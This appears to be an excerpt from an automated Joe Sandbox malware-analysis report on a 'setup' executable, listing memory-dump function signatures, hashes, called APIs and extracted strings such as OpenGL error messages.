                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: a0c26d57960b8352c544134b0dad2ce27c0431b2e417a09140af1ab2c88c8581
                                                                                                    • Instruction ID: 525f9e3d379dd177c25afe2b6dcf422996c52f80c1f2a0649a8b5909880b3af9
                                                                                                    • Opcode Fuzzy Hash: a0c26d57960b8352c544134b0dad2ce27c0431b2e417a09140af1ab2c88c8581
                                                                                                    • Instruction Fuzzy Hash: E7212A71714B819BDB21BF7AC8C5A6EB7E4BF48700F45492CE9889B202D770E991CB91
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 320fb337dfdba228b40e1d7ec017b016568a09fbb96a5d4d6953dc0efa3fad17
                                                                                                    • Instruction ID: 31622db74b2827169da5f12386f91aabb940b6e10c7f571f4b4e923b4a8ab0c6
                                                                                                    • Opcode Fuzzy Hash: 320fb337dfdba228b40e1d7ec017b016568a09fbb96a5d4d6953dc0efa3fad17
                                                                                                    • Instruction Fuzzy Hash: FC0142B49257009BCB54FF78C4C645DBBE4AF05700F81489DE9889B306E739EAA19F82
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __alloca_probe_16$memset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4228662490-0
                                                                                                    • Opcode ID: 2840889f8334f8beb5554eba2324cd33ed6affebb9260fcbb50aec4ac43df908
                                                                                                    • Instruction ID: 3e450a8d707ac53b6b3ea48adf91c16ef768ed43c862f3faff1a9984ba874d04
                                                                                                    • Opcode Fuzzy Hash: 2840889f8334f8beb5554eba2324cd33ed6affebb9260fcbb50aec4ac43df908
                                                                                                    • Instruction Fuzzy Hash: 03A116B4A0050ADFCB15CF98C9809AEB7F6FF89304F2481A9D915AB355D731AD62CF90
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FreeTask
                                                                                                    • String ID:
                                                                                                    • API String ID: 734271698-0
                                                                                                    • Opcode ID: 4caf5e29d4c44ac636cf8d0984502308bcd508df80a6e8eff82d957932ba593a
                                                                                                    • Instruction ID: acd87db7993d53de0a853adc08ce93cbd889d47c2e10532eb9baab33763e2fb9
                                                                                                    • Opcode Fuzzy Hash: 4caf5e29d4c44ac636cf8d0984502308bcd508df80a6e8eff82d957932ba593a
                                                                                                    • Instruction Fuzzy Hash: 09912570A10B05DFD715DF65C988BAABBF8FF19700F11895DE486D7211EB70AA64CB20
                                                                                                    APIs
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002801AF), ref: 00330710
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330718
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330720
                                                                                                    • abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330728
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: abort
                                                                                                    • String ID:
                                                                                                    • API String ID: 4206212132-0
                                                                                                    • Opcode ID: 41ed1319450678a319586cf18b498c64b3f7dfa2f67a3af3ba3c25384a39a5b2
                                                                                                    • Instruction ID: 37a93a12df12f087b1a746636fa235566ac2cfc53abd9a9902b2b27c0c4c8173
                                                                                                    • Opcode Fuzzy Hash: 41ed1319450678a319586cf18b498c64b3f7dfa2f67a3af3ba3c25384a39a5b2
                                                                                                    • Instruction Fuzzy Hash: 425164346262158BC705BF74D0D227EB7E0EF82308F29886CE5889F346DB359859CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Invalid gamma value %f, xrefs: 002440C5
                                                                                                    • Invalid gamma ramp size %i, xrefs: 0024427C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free$calloc
                                                                                                    • String ID: Invalid gamma ramp size %i$Invalid gamma value %f
                                                                                                    • API String ID: 3095843317-3225988985
                                                                                                    • Opcode ID: 4989739d76c5e465ecca90bc99919ef8acdb99e2be726877dd9d3e36715b3f8b
                                                                                                    • Instruction ID: ea7263efd146d797397bde47ba45801d8df11e4e335749d564482c08c10686d8
                                                                                                    • Opcode Fuzzy Hash: 4989739d76c5e465ecca90bc99919ef8acdb99e2be726877dd9d3e36715b3f8b
                                                                                                    • Instruction Fuzzy Hash: E05143B1919301DBD704AF15E18436ABBE0FF84744F01491DF8C897265E3B288A4CF82
                                                                                                    APIs
                                                                                                      • Part of subcall function 0032DDA0: malloc.MSVCRT ref: 0032DDB5
                                                                                                    • strlen.MSVCRT ref: 001EC25B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocstrlen
                                                                                                    • String ID: 3:1m$4x4$:$^$tor:
                                                                                                    • API String ID: 770973918-666033680
                                                                                                    • Opcode ID: 09dc2d112d91b8006a97a6c39b3e2144ffd4c7f4caa8540bf2b56bf94c5f26ea
                                                                                                    • Instruction ID: b53f9cd03c935e5d37bb3b9984839658009eab805b705d94a8037be7059ae302
                                                                                                    • Opcode Fuzzy Hash: 09dc2d112d91b8006a97a6c39b3e2144ffd4c7f4caa8540bf2b56bf94c5f26ea
                                                                                                    • Instruction Fuzzy Hash: 78518A71508B458FD724AF66D4842AEBBE1FF90304F048A1EE99A8B351C774DA06CBC2
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    • Extension name cannot be an empty string, xrefs: 0023E820
                                                                                                    • Cannot query extension without a current OpenGL or OpenGL ES context, xrefs: 0023E800
                                                                                                    • Extension string retrieval is broken, xrefs: 0023E769
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Valuestrcmpstrlenstrstr
                                                                                                    • String ID: Cannot query extension without a current OpenGL or OpenGL ES context$Extension name cannot be an empty string$Extension string retrieval is useren
                                                                                                    • API String ID: 1614321880-2334120326
                                                                                                    • Opcode ID: 70cf47ded1fa71b13428a618d422011af5ff69e885e8d88518b09c52227f2ddc
                                                                                                    • Instruction ID: af7625c4c813c2e2703a0f84cf11f1dab08bea7ad39679992efa65c492288630
                                                                                                    • Opcode Fuzzy Hash: 70cf47ded1fa71b13428a618d422011af5ff69e885e8d88518b09c52227f2ddc
                                                                                                    • Instruction Fuzzy Hash: 773192B59283468FDB10AF74D94936EFBE0AF54355F064C2EE8C887281E77484A9CB53
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID: write
                                                                                                    • API String ID: 1294909896-2104195679
                                                                                                    • Opcode ID: e97a261aeb0e3656cbe50aa4f5303f06f4e7259b75b9c31beb57fae11837cefa
                                                                                                    • Instruction ID: 6d7bb7867e50154459e8d7fcce8c506db33d8d696ee264220888daf9abd6b816
                                                                                                    • Opcode Fuzzy Hash: e97a261aeb0e3656cbe50aa4f5303f06f4e7259b75b9c31beb57fae11837cefa
                                                                                                    • Instruction Fuzzy Hash: 1D313471A083868FCB20DF28C480A6EBBE0AF95758F454C2DF9C897202E735ED45DB42
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: strlen
                                                                                                    • String ID: :%d*%d%s$:m%d$:o%d$:r%d$tta%s%s%s
                                                                                                    • API String ID: 39653677-250652949
                                                                                                    • Opcode ID: c6a10edd06fdc0fd9ae2df811c51e1cdd2e010c0b1a63a56b141c8a15d91b857
                                                                                                    • Instruction ID: 075bb1184f0de1ba43d84418b5a6f90eb909ce55810ed3b03f36a6d56e01d469
                                                                                                    • Opcode Fuzzy Hash: c6a10edd06fdc0fd9ae2df811c51e1cdd2e010c0b1a63a56b141c8a15d91b857
                                                                                                    • Instruction Fuzzy Hash: B53104B5A1D750DBCB10AF19C98165EBBE4BFC8740F61C82EE88C8B305D771D8558B82
                                                                                                    APIs
                                                                                                    • LeaveCriticalSection.KERNEL32 ref: 0032F9A7
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032F9E3
                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 0032FA0F
                                                                                                    • DeleteCriticalSection.KERNEL32 ref: 0032FA6A
                                                                                                    • LeaveCriticalSection.KERNEL32(00000000), ref: 0032F9BD
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002801AF), ref: 00330710
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330718
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330720
                                                                                                      • Part of subcall function 003306E0: abort.MSVCRT(?,?,?,?,?,?,002800FC,?,?,?,?,?,?,00330760), ref: 00330728
                                                                                                    • DeleteCriticalSection.KERNEL32(00000000), ref: 0032FA85
                                                                                                    Memory Dump Source
